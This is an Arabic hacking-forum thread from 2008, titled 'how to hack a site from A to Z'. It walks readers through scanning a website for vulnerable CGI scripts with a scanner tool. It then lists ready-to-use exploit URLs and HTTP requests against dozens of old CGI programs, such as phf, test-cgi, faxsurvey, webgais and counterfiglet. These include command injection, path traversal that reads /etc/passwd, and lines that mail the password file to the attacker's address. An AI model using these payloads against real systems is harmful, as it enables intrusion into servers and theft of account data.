كيف تخترق موقعا من الالف للياء

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

كيف تخترق موقعا من الالف للياء

مُساهمة من طرف root في الخميس أغسطس 14, 2008 3:45 am

استخدم برنامج للبحث عن الثغرات هذا
Cgi Scanner 4.0
و ليس cgi scan
و هذا برنامج رائع و انا مجربه فى 3 مواقع

الوصله

بعد اختيار الموقع و ظهور ثغرات

و من قائمه فايل..اختر save result

اذهب للملف الذى به النتائج ستجده مثل هنا

GenerelSettings,0
FontColSettings,"clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack"
FontRowSettings,"clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack"
UserSettings
528,401,196,50,56,85,127,184,115
URL,STATUS,METHOD,SCRIPT,DESC
http://www.***.com,200,GET,,8080/index.js%2570
http://www.***.com,200,GET,,8080/examples/jsp/num/numguess.js%70
http://www.***.com,200,GET,,8765/example/
http://www.***.com,200,GET,,8765/index.html
http://www.***.com,200,GET,,2301/survey
http://www.***.com,200,GET,,8987/sawmill
http://www.***.com,200,GET,,8080/.jsp/WEB-INF/classes/Env.java
http://www.***.com/_vti_inf.html,200,GET,/_vti_inf.html,"Frontpage98 Hole(_vti_inf.html)"

,,,,
,,,,

اذا كان الموقع به سكريبتات فقط..لن تجد هذا المثال
http://www.***.com/_vti_inf.html,200,GET,/_vti_inf.html,"Frontpage98 Hole(_vti_inf.html)"
لا بد من وجود اسم الثغره,و كلمه hole
ان لم تجد
عندها النتائج ليس لها اهميه


و عند و جود ثغره..مثل هذه -ثغره الفرونت بيج
نستنتج منها:
http://www.***.com اسم الموقع
/_vti_inf.html الثغره
GET,/_vti_inf.html امر الحصول على الصفحه-او الملف-
كل ما علينا هو ان ناخذ حتى هذا الجزء
http://www.***.com/_vti_inf.html,200,GET,/_vti_inf.html
و نكتبه فى المتصفح
و الباقى
"Frontpage98 Hole(_vti_inf.html)"
اسم الثغره
و للحصول على معلومات اكثر عن هذه الثغره
اذهب الى المواقع التاليه و اكتب اسم الثغره و سيعطيك معلومات وافيه جدا عنها
و منها اسم المستخدم و كلمه السر للادمين
http://www.securitywire.com
http://packetstormsecurity.nl


و هذا شرح لبعض الثغرات
اعتقد انه ما محتاج لترجمه
-<>-
PHF

A script which came as standard with the popular Apache web server, also contained a serious flaw. Incorrect parameter checks are done, and therefore literally any command you want can be executed on the system.

Exploit:

Using the URL:

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

will display the password file from the server.

-<>-
Test-cgi

Anyone can remotely inventory the files on a machine.

Exploit:

Using the URL: /cgi-bin/test-cgi?*

will display the contents of the servers cgi directory.

Using the URL: /cgi-bin/test-cgi?/*

will display the contents of the servers root directory.

Both listings will be displayed via the QUERY_STRING field, however, it is also possible to get listings via the CONTENT_TYPE, CONTENT_LENGTH, HTTP_ACCEPT, HTTP_REFERER, PATH_INFO, PATH_TRANSLATED, REQUEST_METHOD, SERVER_PROTOCOL, and (with the help of rDNS) the REMOTE_HOST field.

For example, to get a listing of the root directory via the SERVER_PROTOCOL field, you would telnet to the server on port 80 and use:

GET /cgi-bin/test-cgi?x> /*

-<>-
Fax Survey

If the HylaFAX package is installed (common on some older Linux distributions), you can send arbitrary commands running as the UID of the web server:

Exploit:

/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

The above example URL could expose the passwd file of the server.

-<>-
Dump

This program, written in perl, displays general environment information about the system on which a Web server resides. This information may include the version of Web server software being used, path information and information about the system's directory settings.

-<>-
Handler

A small perl program that allows (in theory) to read and download files under the system's root directory. In fact it allows you to execute any command remotely on the target machine.

Exploit:

GET /cgi-bin/handler/useless_stuff;cat /etc/passwd| ?data=Download

Telneting to the server on port 80 and typing the above will give you the servers password file.

-<>-
Netauth

Netauth is a web based email management system for Windows NT and most Unix platforms. This product contains a security hole that enables remote users to download local files, including files like /etc/shadow.

Exploit:

http://www.example.com/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd

The above url would retrieve the passwd file from the server.

-<>-
Calender.pl

The vulnerability allows remote users to execute arbitrary commands on the web server with the privileges of the httpd process.

The calender_admin.pl script prompts the user for a configuration file to modify, and then in an attempt to authenticate the user, it passes the user input straight to perl open(). This can be easily exploited to execute arbitrary commands remotely.

Exploit:

http://www.example.com/cgi-bin/calender_admin.pl

Going to that URL will result in a username/password/configuration file input fields. Ignoring username and password, enter:

|<command here>|
(With the pipes) in the configuration file field.

For example:
|ping 127.0.0.1|

and the command will be executed.

-<>-
HTML Script

Htmlscript has a vulnerability in it which allows you to access system files, presumably any file the web server user can access.

Exploit:

http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd

The above url would get the passwd file from the server.

-<>-
wwwboard.pl

There is no input checking done on the list of articles which a given article is a followup to. This allows us to give it invalid input such that we can clobber files that the web server has write permissions to.

For example, this HTML snippit, when read by Netscape (and the button is pushed), will clobber articles 1 to 5 on the wwwboard at some.poor.host.

<form method=POST action="http://some.poor.host/cgi-bin/wwwboard.pl">
<input type=hidden name="followup" value="1,2,3,4,5,|.|">
<input type=submit value="Clobber web board">
</form>

_________________
مدير موقع هكراوى
avatar
root
Hacker
Hacker

عدد المساهمات : 48
تاريخ التسجيل : 06/08/2007
العمر : 35
الموقع : www.elfaris1.com

معاينة صفحة البيانات الشخصي للعضو http://www.elfaris1.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: كيف تخترق موقعا من الالف للياء

مُساهمة من طرف root في الخميس أغسطس 14, 2008 3:46 am

-<>-
Finger

Get a list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@acme.net", and that your email address is "your@email.org")

Go to the finger box, and type this in (changing these email addresses for the real ones):

kangaroo@acme.net ; /bin/mail your@email.org < etc/passwd

This takes the passwd file through kangaroo@acme.net and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.

-<>-
bnbform.cgi

BNBForm is a form processing cgi by BigNoseBird. The problem is that this form sends a responding email to users with the contents of any file contained in the 'automessage' variable. This can be used to specify any file that is readable by the uid of the webserver.

Exploit:

The exploit is an html form, but was too large to include here. Please search for "bnbform exploit" at a good search engine to get the code.

-<>-
survey.cgi

BNBSurvey is a CGI for doing simple surveys. This script has 2 modes of operation - the first being that people can vote as many times as they like, and the second being that the people can only vote once every hour. The first operation is the default.

If this second mode of operation is enabled though, remote users can use metacharacters in the 'filebase' variable to execute arbitrary commands. (ie. if $ENFORCEMENT = "1" is set in the cgi script).

Exploit:

This exploit code was too large to include, please search for "bnbsurvey exploit" at a good search engine.

-<>-
classifieds.cgi

Classifieds is a free cgi script for handling classified ads. There are multiple security holes in this that allow remote execution. Firstly, by setting your email address as something like "duke@viper.net.au</etc/passwd" you can read files remotely off the server.

Also, by setting the hidden variables on a html form, a remote user can force arbitary commands to be executed. One example of this is modifying the following variable:

<input type="hidden" name="mailprog" value="/usr/sbin/sendmail">

Changing its value to another command will cause that alternate command to be executed.

-<>-
textcounter.pl

Textcounter allows anybody to execute commands on your system with the same rights as the httpd daemon.

-<>-
Count.cgi

There are at least two buffer overflow vulnerabilities in wwwcount, a widely used CGI web counter. The most harmful occurs when the QUERY_STRING environment variable (which reflects the url asked by the www client) is copied to a fixed-size dynamic buffer. Another one occures only when the counter is compiled with a special authentication option, and may not be exploitable.

-<>-
WebGais

WebGais is an interface to the GAIS search tool. It installs a few programs in /cgi-bin. The main utility is called "webgais" and does the actual interfacing with the search tool.

It reads the query from a user form, and then runs the GAIS search engine for that query. The author tried to protect the program by using single quotes around the query when he passed it to a "system" command. But he forgot one VERY important thing: to strip single quotes from the query (this was done in Glimpse).

Exploit:

telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)

query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

-<>-
Web Sendmail

Websendmail is a cgi-bin that comes with the WEBgais package, which is an interface to the GAIS search tool. It is a PERL script that reads input from a form and sends e-mail to the specified destination.

Exploit:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)

receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

-<>-
CGI Counter

The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server, but other exploits can be used to get root access on an unpatched OS.

Exploit:

Using straight URL
http://www.example.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
(This will display the uname of a given system)

Passing commands in a variable:
$ telnet www.example.com www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd

$ telnet www.example.com www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w

-<>-
SGI infosrch

The Infosearch subsystem is used to search and browse virtually all SGI on-line documentation. A vulnerability has been discovered in infosrch.cgi which could allow any remote user to view files on the vulnerable system with privileges of the user "nobody".

-<>-
Poll It

Poll It allows easy hosting of online polls on websites. However this CGI also enables remote attackers to read any world readable file on the server.

Exploit:

/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00

The above URL would retrieve the passwd file from the server.

-<>-
Robpoll

Robpoll is a free cgi based admin program.

Exploit:

First go to:

http://www.example.com/cgi-bin/robpoll.cgi?Admin

You will have an option to change the password. The password by default is "robpoll", leaving this password thus compromises the system and its files.

-<>-
WebBanner

A security hole in the WebBanner CGI enables remote attackers to view certain files on the system, and possibily execute system commands as well.

Exploit:

http://www.example.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd

The above URL will retrieve the passwd file from the server.

-<>-
WebWho+

WebWho+ is a free cgi script for executing whois queries via the www. Though it does perform checks for shell escape characters on some parameters, it misses the 'type' variable and allows for malicious input to be sent to a shell. It is possible to execute arbitrary commands on a webserver running WebWho+ v1.1 with the uid of the webserver (usually nobody).

-<>--<>-
مواقع مفيده
Http://www.securityfocus.com
Http://www.packetstormsecurity.org

_________________
مدير موقع هكراوى
avatar
root
Hacker
Hacker

عدد المساهمات : 48
تاريخ التسجيل : 06/08/2007
العمر : 35
الموقع : www.elfaris1.com

معاينة صفحة البيانات الشخصي للعضو http://www.elfaris1.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى